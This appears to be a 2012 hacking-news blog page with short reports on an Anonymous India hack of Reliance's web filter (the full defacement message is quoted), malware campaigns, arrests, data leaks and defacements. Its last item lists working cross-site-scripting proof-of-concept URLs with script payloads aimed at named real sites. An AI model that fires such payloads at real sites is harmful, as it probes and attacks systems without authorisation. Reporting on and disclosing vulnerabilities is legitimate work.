Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Indian Hackers
Anonymous Hackers Featured Indian Hackers

#OpIndia: Reliance Internet Hacked by Anonymous India




Breaking News:
Anonymous India hacked into the Reliance Communication’s website filtering and blocking server . Reliance Communications customers were unable to access Facebook, Twitter and other sites for several hours. 

Recently, Indian ISP are blocking torrent, file sharing and some video sharing websites due to court orders.  Hacktivist group Anonymous decided to retaliate and started attacking government websites with Distributed Denial of Service(DDOS) attacks. 

Today, They hacked into the filtering server used by Reliance Communications and filtered a lot of websites, like Twitter.

As reported by Naveen Thakur writing for White Code,users who try to access Twitter are redirected to a defacement page. The defacement page contains the following message:

Anonymous REVENGE / WE OWN YOU 
Told you not to mess with free speech and lesser with Anonymous

Government of India, you know what you did wrong. you caused out twitter account to be blocked now we will show you what anonymous is capable of doing.
———————————————-
We give you 24Hours at maximum to give our twitter account back and apologize 
Give @OpIndia_Revenge BACK
———————————————–
IF NOT
We will unleash hell and shiver on you
Greeting government of India, you were bad really bad. One of the worst governments the world has. Yet we tried our best not to go too tough on you, and then you decided to cross over us, bad guys bad idea.

We tried to do a slow, non violent protest and government decided to cover out mouths we will not sit idle while our freedom is take away. We will continue our non-violent protest and guess what you will never beat us, ever.

When we started to speak truth, the government of India forced our online twitter account @Opindia_revenge to be suspended. 

Dear People

People We for 1 entire week attacked government websites, run by your money and no one in your government cared, then we decided to hit the Rich guys in the entertainment and IPL and Reliance and your government sprang into action. Shame on this government. It is time you people realized that this government don’t care about you. If we had attacked what belong to you they wont have minded. But if at all the smallest scratch appears on the rich and elite they are up and ready to act. Time you throw away these puppets of the rich and replace it with a new system that respect the constitution.Here is a list of all sites block by the governement
and reliances Injustice !!

Opposition

Don’t get ready to jump up and down and make a big show, because we know you are worse that what the word worse can explain. You and the ruling parties share profits in every corruption and then play a drama to fool the people. People realize that they are nothing but the ruling party itself just making mockery of every system that is in place and the people who voted them to power. you guys have no right to act as saviors of people.

MEDIA

You are meant to be the 4th estate of democracy. The supporters and guardians of people and their rights but you have failed and we don’t tolerate the kind of actions you are taking now. plotting with the government that is trying to abuse its own people and help corporations steal and befit from the weakness of your people. Media you cover us or not we will do what it takes to fight for peoples rights something you guys are scared to shit to attempt. If you can then show us you are not advertisement sucking leaches and tools of the government to enslave the people. We may have expected the US media to behave this way but not you guys who talked about not being influenced by anyone. We only DDoSed RBI, and contrary to what they think, it was down for a long time this is a message to TOI that is not true we only prevented it from being accessed and we kept it down.EXPECT US
We are Anonymous

We are a Legion
We do not forgive
We do not forget
Expect Us.. You should have.

This is brought to you by => #OpIndia #AnonymousINDIA #TeamVoid
Twitter => @OpIndia_back 
Dear Reliance users if you wanted to visit a site but could not :P Please use the following links .. If the site is not here please wait for you “Awesome” ISP to fix this “technical” Issue :D Facebook Google 
Gmail 
Yahoo 
twitter 
Or Go ahead and use this 
TOR(also useful for “blocked” sites
@Admin you tried your best (even going for outside help) but you coud not keep me away :D,now im a permenent presence in you server’s try to find me ;)

Anonymous had last week brought down various websites including that of Congress Party and Reliance Big Cinemas to protest against the blocking of Vimeo and file-sharing sites by ISPs.
Read more »
Software Release
Breaking News Network Mapper PenTesting Tools Software Release

Nmap Security Scanner version v6.0 released


The Nmap Project released Nmap Security Scanner version 6.00. It is the product of almost three years of work, 3,924 code commits, and more than a dozen point releases since the big Nmap 5 release in July 2009.


Nmap 6 includes a more powerful Nmap Scripting Engine, 289 new scripts, better web scanning, full IPv6 support, the Nping packet prober, faster scans, and much more! We recommend that all current users upgrade.

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for network inventory, managing service upgrade schedules, monitoring host or service uptime, and many other tasks


Top 6 Improvements in Nmap 6

  • NSE Enhanced
  • Better Web Scanning
  • Full IPv6 Support
  • New Nping Tool
  • Better Zenmap GUI & results viewer
  • Faster scans
More details about the latest version can be found here:
http://nmap.org/6/
Read more »
Cyber Crime
Cyber Crime

NJ mayor accused of hacking website to stifle recall effort

The FBI arrested a New Jersey mayor and his adult son for allegedly hacking into websites of political foes who were seeking his recall.

West New York Mayor Felix Roque (row'-KAY) and his 22-year-old son, Joseph, each face more than 10 years in prison if convicted on charges of gaining unauthorized access to computers, conspiracy and causing damage to protected computers.

Both were arrested Thursday morning by FBI agents and have been released on bail.

Felix Roque's attorney, Bryan Blaney, said Friday that his client planned to plead not guilty at an arraignment scheduled for June 4.

A message was left Friday with Joseph Roque's attorney, John Azzarello, but his office was closed.

Roque is a Democrat who beat former Mayor Sal Vega in a nonpartisan election this month.
Read more »
Hackers Arrested
Breaking News Cyber Crime Hackers Arrested

Bredolab Botnet creator Sentenced to 4 years in Prison


A mastermind behind the Bredolab Botnet was found guilty and sentenced to four years in prison by an Armenian district court.

A 27-year-old Georgy Avanesov, a Russian citizen of Armenian descent, was arrested in 2010 for creating and spreading the Bredolab virus that infected an estimated 30 million computers around the world. The malware siphoned bank account passwords and other confidential information from infected computers.

Avanesov developed Bredolab in Armenia around March 2009 and used computer servers in Holland and France to spread the virus.



According to prosecutors, he earned about $125,000 a month renting out access to compromised computers in his botnet so that criminals could use them to spread other malware, send out spam, or use them to conduct distributed denial-of-service attacks.

Avanesov reportedly confessed to investigators that he had written Bredolab, but denied having any knowledge of its criminal usage. He simply made it available to others, he argued, without foreknowledge of how they planned to use it.
Read more »
Spam Report
Spam Report

Mail attachment exploits vulnerability in the Hancom Office word processing software

TrendMicro researchers spotted a malicious mail , it contains a specially crafted Hangul Word Processor document (.hwp) that exploits an application vulnerability in the Hancom Office word processing software.

This specially crafted document arrived as an attachment of an email, which used a recent murder case in Korea as social engineering ploy. The email was sent to numerous employees of a prominent Korean company.

Upon opening the malicious attachment, TROJ_MDROP.ZD exploits a still unidentified vulnerability in order to drop and execute the backdoor BKDR_VISEL.FO in the background. This backdoor gives remote access to a potential attacker, who may perform malicious routines on the infected machine.

According to researchers, BKDR_VISEL.FO also terminates processes related to specific antivirus programs, making its detection and removal difficult. The backdoor also downloads and executes other malicious files, leaving the compromised system susceptible to further infection and data theft.

After execution, TROJ_MDROP.ZD replaces itself with a non-malicious .HWP document in order to prevent the user from suspecting any malicious activity.
Read more »
Featured
CA Hacks Featured

Yahoo mistakenly leaks private certificate with Chrome extension version of Axis


Yahoo! has released a new browser for iPad and iPhone, dubbed "Axis," along with corresponding extensions for desktop versions of Chrome, Firefox, Safari, and IE 9.

Within hours of the launch, a Security researcher Nik Cubrilovic discovered that Yahoo mistakenly bundled their own private certificate file inside the Chrome extension version of Axis.

"A private key is used by a developer to sign an extension package in order to prove that the extension is actually from the developer. If a malicious third party were to obtain the private key, they would be able to release an extension signed with that developer's certificate." Sophos security researcher says.

With the private key in the wild it would be possible to create and sign an extension which appeared to be from Yahoo!

Cubrilovic used Yahoo's own certificate to sign a forged version of the Chrome extension as a proof of concept.

Cubrilovic writes about the implications of Yahoo's inclusion of the private certificate:

"The clearest implication is that with the private certificate file and a fake extension you can create a spoofed package that captures all web traffic, including passwords, session cookies, etc. The easiest way to get this installed onto a victims machine would be to DNS spoof the update URL. The next time the extension attempts to update it will silently install and run the spoofed extension."

Read more »
Cyber Crime
Breaking News Cyber Crime

Fake Angry Birds app makers fined £50,000


A firm that disguised Android malware as Angry Birds games has been fined £50,000 ($78,300) by UK premium-rate service regulator PhonepayPlus.


UK industry regulator PhonepayPlus uncovered that 1,391 mobile phone numbers in the UK had been stung by the scam, that targeted Android owners who downloaded Trojan horse versions of popular games such as "Angry Birds", "Assassins Creed" and "Cut the Rope".

When an innocent user start one of the apps , it would send three premium rate text messages, costing £15. Charges would continue to mount unless users removed the offending app.

It's estimated that there were some 14,000 downloads of the malicious apps around the globe.

A1 Agregator Limited ran the premium rate payment system used by the malware to fraudulently charge consumers' smartphones.

As well as the firm being fined £50,000, it has also been ordered to directly refund all consumers within three months, regardless of whether they complained or not. In addition, the company has been barred from launching any other premium rate services in the UK without the permission of PhonepayPlus.

Read more »
Team Dig7tal
Database Leaked Team Dig7tal

Health Council Canada hacked by TeamDigi7al

 

A Hacker called as 'Th1nkT0k3n', from TeamDigi7al, break into the Health Council Canada website by exploiting the SQL injection vulnerability and extracted confidential data from the database.

"I discovered a vuln on HealthCouncilCanada.ca From there I found the rest of the garbage.Once I started to sniff through the dbs, I stumbled upon some major n00b's 'work'."Hacker said in the leak.

"Whoever is in charge of this wackness should be let go. Your work is poop, admin!"


The leak contains database details, email address, passwords(plain text). The leak also contains data belong to some other sites.
Read more »
Defaced Website
3xp1r3 Cyber Army Defaced Website

3xp1r3 Cyber Army hacked 643 Sites


The 3xp1r3 Cyber Army, a Bangladesh hackers group,  continues to protest against the Indian Border Security Force (BSF) and its violent ways. Their latest operation targeted a number of 643 websites that they defaced.

The websites, most likely hosted on a single server, were altered to host the hacktivists’ message.


Apparently, many of the affected sites are from Canada, India and Turkey, but there are also a number of .com domains in the list the hackers published on Pastebin(http://pastebin.com/VwbCMBY5), which means that the targets could be spread out worldwide.

According to softpedia report, many administrators appeared to be working on restoring their websites, but some of the affected ones still displayed the hackers’ message.
Read more »
Hackers News
Hackers News

US hackers take cyber war to al-Qaeda sites

WASHINGTON: US cyber experts have hacked into websites being used by al-Qaeda's affiliate in Yemen and substituted material that bragged about killing Americans with information about civilians killed in terrorist strikes, Hillary Clinton has confirmed.

In a rare public admission of the covert cyber war against extremists, the US Secretary of State says experts based at the US State Department hacked Yemeni tribal websites.

When al-Qaeda recruitment propaganda appeared on tribal sites in Yemen, Mrs Clinton said, ''within 48 hours, our team plastered the same sites with altered versions … that showed the toll al-Qaeda attacks have taken on the Yemeni people''.


The revelation provided an unusual window into low-level cyber-warfare activities that the US government rarely discusses.

In a speech to the Special Operations Command in Florida, Mrs Clinton cited the hacking operation as an example of growing counterterrorism co-operation between the State Department, intelligence agencies and the military. She said State Department experts were also working with Special Operations Forces on the ground in central Africa, helping to encourage defections in the Lord's Resistance Army, led by Joseph Kony.

As the US military has expanded into areas formerly reserved for diplomats, Mrs Clinton has been an advocate for increasing her department's reach, with civilian-military operations she calls ''smart power''. ''We need Special Operations Forces who are as comfortable drinking tea with tribal leaders as raiding a terrorist compound,'' she said. ''We also need diplomats and development experts who are up to the job of being your partners.

''We can tell our efforts are starting to have an impact'' in Yemen, where the group al-Qaeda in the Arabian peninsula is based, ''because extremists are publicly venting their frustration and asking supporters not to believe everything they read on the internet''.

Mrs Clinton said the hacking was conducted by the Centre for Strategic Counterterrorism Communications, based at the State Department, with expertise drawn from the military and the intelligence community. The State Department's activities are part of online efforts to stem the spread of radical Islamist ideology that stretch back at least a decade.

The US Central Command had a team that monitors blogs and forums, targeting those that are moderate in tone and engaging with users, said Major David Nevers, former chief of the team. ''We try to concentrate our energy and efforts … [on] those who haven't been radicalised. The idea is to go where the conversation is taking place, using … extremist commentary or propaganda as a jumping-off point to people who are listening in.''

Evan Kohlmann, a terrorism consultant who tracks jihadist websites, said the tactic could harm al-Qaeda's image among potential recruits but questioned its effectiveness on the ground.

''If you're already living in Yemen and in a tribal area, you probably don't need to go to a website to join al-Qaeda,'' he said.

[source]
Read more »
Web Application Vulnerability
Vulnerability Web Application Vulnerability

AddThis, TECHNORATI,Way2SMS and other sites vulnerable to XSS


Security Researcher 'Ankit Sharma' have discovered Cross site scripting vulnerability in lot of high profile sites .

NASDAQ, TECHNORATI,Conduit ,AddThis,AIRODUMP websites are found to be vulnerable to XSS. Also he found Samsung, Sourceforge ,oracle sites are vulnerable to this attack.

NASDAQ : http://stocksplits.nasdaq.com/UpcomingSplits.asp?pageName=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

TECHNORATI : http://technorati.com/search?return=posts&authority=high&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

CONDUIT : http://search.conduit.com/?ctid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

ADDTHIS : http://www.addthis.com/services/all?a=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

AIRODUMP : http://download.airodump.net/datas/?dir=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

SAMSUNG : https://support-us.samsung.com/cyber/popup/pop_uploadmovie.jsp?symptom_movieid="><script>alert(document.cookie)</script>

SOURCEFORGE : http://marcion.sourceforge.net/dictionary/output.php?S=on&B=on&Sa=on&F=on&Sf=on&Fb=on&A=on&O=on&ssA=on&NH=on&und=on&exact=exact&word=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&search=search

 ORACLE : http://tahiti.oracle.com/pls/db92/db92.show_toc?partno=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

NOKIA : http://beta.nokia.com/s40/nps/scripts/s40_nps.php?project_name=Ovi%20Browser&emailfield=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Read more »
Subscribe to: Comments (Atom)